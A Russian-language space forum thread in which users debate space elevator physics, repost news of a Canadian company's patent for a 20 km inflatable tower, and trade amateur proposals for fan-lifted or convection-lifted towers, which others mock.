Вот асинхронный лифт механически с Землей не связан, не может получать энергию от её вращения, поэтому его придется доразгонять двигателем после каждого выведения.
Оба.
Только Земле это слону дробина а стационарнику нет.
Название: Низкоорбитальный космический лифт.
Отправлено: m-s Gelezniak от 27.07.2015 17:56:02
Это аналогично перемещению массы к центру (от центра) в вращающейся станции. Или ты начинаешь отставать по касательной скорости от касательной скорости оболочки станции. Или тормозится вращение самой станции. Кстати эффект обратим.
Название: Низкоорбитальный космический лифт.
Отправлено: Shestoper от 27.07.2015 19:20:43
Цитироватьm-s Gelezniak пишет:
Или тормозится вращение самой станции.
Вот так и будет тормозиться вращение системы лифт-Земля.
На трос в точке движения ПН начнет действовать боковая сила, как на тетиву лука при стрельбе. Но, если центробежная сила, действующая на лифт, будет достаточно велика, его геостационарный фрагмент не будет существенно тормозиться, после небольшого торможения и опускания будет опять отброшен центробежной силой наверх.

Впрочем, если я и ошибаюсь в оценке этих процессов - стационарный лифт мне никогда не нравился, не думаю что он будет реализован. Слишком циклопическая штука, слишком жесткие требования к тросу, при относительно скромной пропускной способности.
Петля Лофтрома или ОТС в этом плане выглядят более многообещающими. Тоже гиганты, но с гораздо большей пропускной способностью, и реализуются без экстремально прочных материалов.
Название: Низкоорбитальный космический лифт.
Отправлено: Leonar от 27.07.2015 20:08:48
Цитироватьmoon пишет:
Интересно а можете это статьей оформить и ссылку кинуть в тему?
какофф товарисч... сам считать свою лабуду не буду, а пожалуйста вы товарисчи докажите сами что вы не ежики...
Цитироватьmoon пишет:
у меня есть дела и поважнее. Вот вам рабочая модель
сам то разобрался в ней?

 
Название: Низкоорбитальный космический лифт.
Отправлено: SmartLion от 27.07.2015 21:05:10
Цитироватьmoon пишет:
ЦитироватьSmartLion пишет:
moon , даже если трубки такие смогут сделать в далёком будущем, то это всё равно не поможет идее космического лифта.

Трос (или в данном случае шланг) имеет массу и сила тяжести тянет его вниз, чтобы не упасть на землю - вентиляторы должны постоянно крутиться - тратить топливо.
Какое топливо? За пределами атмосферы куча солнечной энергии. единственная проблема это вращение Земли ночью электричества не будет..  :)  )) летать не будет... Естественно что полноценного лифта орбитального не получится...Так максимум забава для туристов... На лифту даже невесомости не будет... то есть особого практического применения пока нет..

Слона то я не приметил ;)
У нас вокруг вакуум, а мы зачем то крутим вентилятор.
Название: Низкоорбитальный космический лифт.
Отправлено: moon от 06.08.2015 12:28:59
ЦитироватьSmartLion пишет:
 
Слона то я не приметил  ;)
У нас вокруг вакуум, а мы зачем то крутим вентилятор.
Ну да Вам прежде чем влазить в обсуждение стоило бы ознакомится с принципом работы предложенного девайса.
Название: Низкоорбитальный космический лифт.
Отправлено: blik от 06.08.2015 20:29:49
Цитироватьm-s Gelezniak пишет:
Это аналогично перемещению массы к центру (от центра) в вращающейся станции. Или ты начинаешь отставать по касательной скорости от касательной скорости оболочки станции. Или тормозится вращение самой станции. Кстати эффект обратим.
Земля потом стационарный спутник дораскрутит через трос. В итоге подъем на стационар заберет момент только у земли. Все уже считали  :)
Да, еще нужно учитывать противовес с другой стороны стационара
Название: Низкоорбитальный космический лифт.
Отправлено: Garixon от 19.08.2015 02:36:29
вроде уже было, но на всякий случай
Канадская компания получила патент на строительство лифта в стратосферу (http://dom.lenta.ru/news/2015/08/18/spaceelevator/)
ЦитироватьКанадская компания Thoth Technology получила патент на строительство лифта в стратосферу — башню высотой 20 километров. Патент на строительство сооружения одобрен в США. Об этом пишет британское издание The Telegraph.
Башня будет в 20 раз выше самого высокого здания на планете, небоскреба Бурдж Халиф в Дубае (его высота составляет 828 метров).
По оценкам компании, с помощью лифта можно будет попадать в космос на 30 процентов экономнее, чем на ракете. Кроме того, предполагается, что лифт будет использоваться для исследований, генерации электроэнергии из ветра, ретрансляции данных и космического туризма.

«Астронавты будут подниматься вверх на 20 километров на лифте, а с вершины башни будут отправляться на орбиту на космических самолетах, которые будут возвращаться обратно для дозаправки и нового полета», — пояснил изобретатель технологии Брендан Квин.
Чтобы решить проблему предела Армстронга (на высоте 19 километров над уровнем моря атмосферное давление настолько низкое, что вода в человеческом организме закипает) и сильного ветра, изобретатели предложили использовать надувные секции и маховики.
Конкретные сроки строительства компания пока не сообщает.
Впервые идею построить космические лифты предложил в 1894 году ученый Константин Циолковский. Писатель и футуролог Артур Кларк в своей книге «Фонтаны рая», изданной в 1979, также описал такие лифты.
Японская компания «Обаяси», специализирующаяся на строительстве небоскребов, планирует к 2050 году построить лифт в космос.
 
     

 
 

Название: Низкоорбитальный космический лифт.
Отправлено: Garixon от 25.08.2015 00:08:28
Проект «Космический лифт» на шаг приблизился к своей реализации (http://astronews.ru/cgi-bin/mng.cgi?page=news&news=7687)
ЦитироватьКосмические энтузиасты и любители научной фантастики, ликуйте: возведение космического лифта на шаг приблизилось к реальности. Канадская космическая компания недавно получила американский патент на строительство космического лифта, который будет возвышаться примерно на 20 километров над поверхностью Земли.

Несмотря на то, что космические лифты пока существуют лишь в теории, эксперты космической отрасли все чаще обсуждают перспективы таких конструкций. В будущем они могут представить собой более дешевую альтернативу запускам ракет, в особенности, когда речь идет об отправке в космос тяжелых грузов или людей. По данным компании Thoth Technology Inc., которая и получила патент, лифт позволит сэкономить до 30 процентов средств, расходуемых на топливо для обычных ракет. Кроме того, система будет многоразовой, что позволит сократить дальнейшие затраты.

«Электрический лифт сможет поднимать астронавтов на 20 км вверх», - объясняет разработчик Брендан Куин. «Дальнейшее путешествие будет осуществляться с помощью космических самолетов. Они будут доставлять пассажиров и груз на орбиту, а затем возвращаться на вершину вышки для дозаправки и совершения новых стартов».

По словам Каролины Робертс, варианты осуществления транспортировки груза и пассажиров в космическое пространство расширятся, если другие компании будут также работать над созданием альтернатив традиционных ракет. Так, например, компания SpaceX на сегодняшний день предприняла несколько попыток посадить первую ступень своей ракеты Falcon 9 на плавучую платформу. Данная технология в конечном итоге позволит снизить затраты на запуск.

«Успешная посадка первой ступени ракеты на плавучую баржу, безусловно, станет огромным достижение», - говорит Робертс. «Но посадка на высоте 20 км над уровнем моря во многом приблизит космический полет к полету на пассажирском самолете, который является для нас обычным делом».
Название: Низкоорбитальный космический лифт.
Отправлено: Svetlana от 07.09.2015 16:42:18
Канадские инженеры для запуска космических аппаратов на орбиту предлагают изготовить башню из армированных надувных секций с внутренним лифтом. Для вертикальной стабилизации башни предлагают использовать систему маховиков, которые обеспечат динамическую устойчивость и будут действовать в качестве компрессоров для конструкции.Маховики смогут регулировать давление и вращение, компенсировать любой изгиб башни и будут держать её в фиксированном состоянии всё время. см.http://techvesti.ru/node/8012
В развитие темы башен с высотой более 15км, предлагаю рассмотреть 2 варианта, которые в отличие от канадской башни, не используют гелия для создания подъёмной силы, удерживающей башни в воздухе.
1) Для поднятия надувной башни на высоту 20км  создавать вертикальную подъёмную силу вентиляторами (как у дронов),прикреплёнными снаружи к надувной башне равномерно по всей её высоте через каждые несколько сотен метров.
Надувная башня может быть гофрированной и подниматься вверх после сборки на земле - постепенно. Гофры могут быть спиральными или секционированными.
При подъёме трубы сначала растягивают верхние секции гофр подъёмными электровентиляторами, размещёнными на периметре гофросекций. Затем растягивают всё более и более нижние гофры, пока все секции гофр не растянутся до максимальных расчётных значений растягивания. Электропитание на электровентиляторы передают через электрокабели, закреплённые на внутренних стенках гофросекций.
2) Чтобы удерживать в воздухе башню, создавать подъёмную силу восходящими потоками воздуха снаружи вокруг башни. В этом варианте по всей высоте к наружной поверхности башни крепят крылья - неподвижные лопаточные венцы для передачи вертикальной тяги от вертикального потока воздуха вокруг надувной башни к оболочке надувной башни.
Вертикальный конвективный поток воздуха снаружи вокруг надувной трубы в атмосферном воздухе
формируют за счет конвективного теплопереноса от стенок надувной трубы, нагреваемых встроенными в стенку надувной трубы ленточными теплоэлектронагревателями. Можно также греть солнечным или СВЧ-излучением, сфокусированным на наружную поверхность надувной трубы.
Внутри трубы к её внутренней поверхности также крепят неподвижные лопаточные венцы для осевой закрутки внутреннего воздушного потока.Так как восходящий поток в трубе закручен, то гиромомент позволит башне-трубе стабилизировать вертикальную форму.
Сжатый воздух нагнетают внутрь надувной трубы турбокомпрессорами в основание надувной трубы.
По мере подъёма закачанного в надувную гофротрубу сжатого воздуха,подогревают воздушный поток внутри трубы через поверхностный теплообменник на стенках надувной трубы.Движущийся вверх внутри надувной трубы воздух за счет силы трения о стенки трубы, передаёт стенкам импульс,создающий распределённую по всей высоте трубы вертикальную силу тяги, удерживающую надувную трубу в воздухе.
Прошедший через всю длину надувной трубы закрученный воздушный поток выпускают через поворотные сопла на верхней части трубы вниз. Управляя тягой поворотных сопел наверху трубы компенсируют горизонтальную силу давления атмосферного ветра на надувную трубу. Для создания реактивной подъёмной силы от воздуха, выпускаемого вниз из поворотных сопел, эти сопла можно разместить равномерно по всей высоте трубы через одинаковые промежутки в несколько сот метров.
Грузы будут доставлять наверх по пневмотрубе, благодаря нагнетаемому давлению.На вершине трубы можно разместить ФАР для слежения.
Название: Низкоорбитальный космический лифт.
Отправлено: pkl от 07.09.2015 19:26:07
А чем это лучше ракеты?
Название: Низкоорбитальный космический лифт.
Отправлено: Leonar от 07.09.2015 18:40:02
Главное было фар впихнуть, все терь точно денег дадут :-)
Название: Низкоорбитальный космический лифт.
Отправлено: Svetlana от 07.09.2015 19:54:02
ЦитироватьSmartLion пишет:
Однако эти затраты вообще рядом не лежали с затратами на постоянно работающий космический лифт.
Зато этот лифт - постоянно работающий. И он поможет решить проблему глобального потепления из-за  увеличения концентрации углекислого газа в атмосфере. Решение в том, что этим лифтом можно с поверхности земли турбокомпрессорами гнать по трубе лифта и выбрасывать в верхние слои атмосферы воздух с пылью. Диаметр пылинок несколько микрон. Эти пылинки будут оседать на Землю несколько лет, стратосферными ветрами будут разноситься вокруг земного шара и вместо пыли от вулканов затенять Землю от избыточного солнечного излучения. Например, после взрыва вулкана Кракатау, средняя температура на Земле в течение нескольких лет была ниже обычной на 1..1,5 градуса.
Название: Низкоорбитальный космический лифт.
Отправлено: Svetlana от 07.09.2015 21:19:56
Цитироватьpkl пишет:
А чем это лучше ракеты?
Ракеты загрязняют нижние слои атмосферы выхлопом ракетных двигателей, а надувной лифт - экологически чист. Более того, этим надувным лифтом можно утилизировать в верхние слои атмосферы дымовые газы тепловых электростанций, работающих на органическом топливе. Кстати, стенки надувной гофрированной трубы лифта могут быть сделаны вращающимися, подобно гибкому шлангу бормашины. Конечно, вращающимися тогда будут и лопаточные венцы крыльев, закреплённые на наружной стороне поверхности надувной трубы неравномерно по её высоте (Побольше крыльев в нижней части трубы, где плотность атмосферы выше. Зато в верхней части надувной гофрированной трубы можно увеличить количество выпускных поворотных сопел). Вращение лопаточных венцов в восходящем токе тёплого воздуха вокруг трубы приведёт к увеличению подъёмной силы, создаваемой крыльями - лопатками венцов. Увеличится и максимальный вес грузов, которые могут быть доставлены на верхний конец надувной трубы.Можно также в верхней части трубы (где стратосферные ветра отличаются силой и постоянством) расположить ветроэлектрогенераторы.
Название: Низкоорбитальный космический лифт.
Отправлено: pkl от 07.09.2015 23:40:27
Ну и пусть себе загрязняют - их мало и летают они редко.
Название: Низкоорбитальный космический лифт.
Отправлено: Кубик от 07.09.2015 23:00:39
Цитировать
ЦитироватьSvetlana пишет: Более того, этим надувным лифтом можно утилизировать в верхние слои атмосферы дымовые газы тепловых электростанций, работающих на органическом топливе
Ага, одну трубу на весь регион   :D  

ЦитироватьSvetlana пишет: Можно также в верхней части трубы (где стратосферные ветра отличаются силой и
постоянством) расположить ветроэлектрогенераторы.

И тем самым увеличить ветровую нагрузку.. :cry:
Название: Низкоорбитальный космический лифт.
Отправлено: Leonar от 08.09.2015 06:36:39
И тем самым мы будем способствовать этому эфекту,
За что боролись так сказать
ЦитироватьSvetlana пишет:

ЦитироватьSmartLion   пишет:
Однако эти затраты вообще рядом не лежали с затратами на постоянно работающий космический лифт.й
Зато этот лифт - постоянно работающий. И он поможет решить проблему глобального потепления из-за  увеличения концентрации углекислого газа в атмосфере. Решение в том, что этим лифтом можно с поверхности земли турбокомпрессорами гнать по трубе лифта и выбрасывать в верхние слои атмосферы воздух с пылью. Диаметр пылинок несколько микрон. Эти пылинки будут оседать на Землю несколько лет, стратосферными ветрами будут разноситься вокруг земного шара и вместо пыли от вулканов затенять Землю от избыточного солнечного излучения. Например, после взрыва вулкана Кракатау, средняя температура на Земле в течение нескольких лет была ниже обычной на 1..1,5 градуса.
Название: Низкоорбитальный космический лифт.
Отправлено: Svetlana от 10.09.2015 09:28:54
Для снижения затрат на электроэнергию, используемую при нагреве стенок надувной башни, её стенки можно снаружи выкрасить в черный цвет. Солнечными лучами черные стенки надувной башни будут дополнительно нагреваться и создавать конвективный восходящий поток атмосферного воздуха вокруг и внутри надувной башни, подъёмная сила  которого, передаваемая стенкам башни через крепежи крыльев-лопаточных венцов, удерживает башню от падения, снижает требования к прочности на сжатие и растяжение материалов конструкции башни. Перепад температур, между стенками башни и температурой атмосферного воздуха на высоте,  который создаёт солнечный подогрев стенок башни, составляет несколько десятков градусов. Этого перепада достаточно для создания конвективного тока воздуха вокруг и внутри башни с вертикальной  скоростью  около 10..30  метров в секунду. При такой вертикальной силе ветра  можно вырабатывать электроэнергию ветряными электрогенераторами.  Аналогичные  оценки  изменения температуры воздуха в башне  были проделаны в проекте энергетической башни (https://ru.wikipedia.org/wiki/Энергетическая_башня), в которой воздух внутри башни не нагревают, а наоборот, наоборот, охлаждают водой, закачиваемой наверх башни и в капельном виде сбрасываемой сверху вниз внутри башни
(https://img.novosti-kosmonavtiki.ru/102843.png)
Оценки мощности нагрева стенок башни солнечными лучами, при плотности солнечного излучения 1Квт/м2
2,30E+02мдиаметр башни
1,50E+04мвысота башни
3,45E+06м2площадь сечения башни
3,45E+09Втмощность солнечного нагрева башни
Название: Низкоорбитальный космический лифт.
Отправлено: Кубик от 10.09.2015 23:55:02
Земля ведь вертится..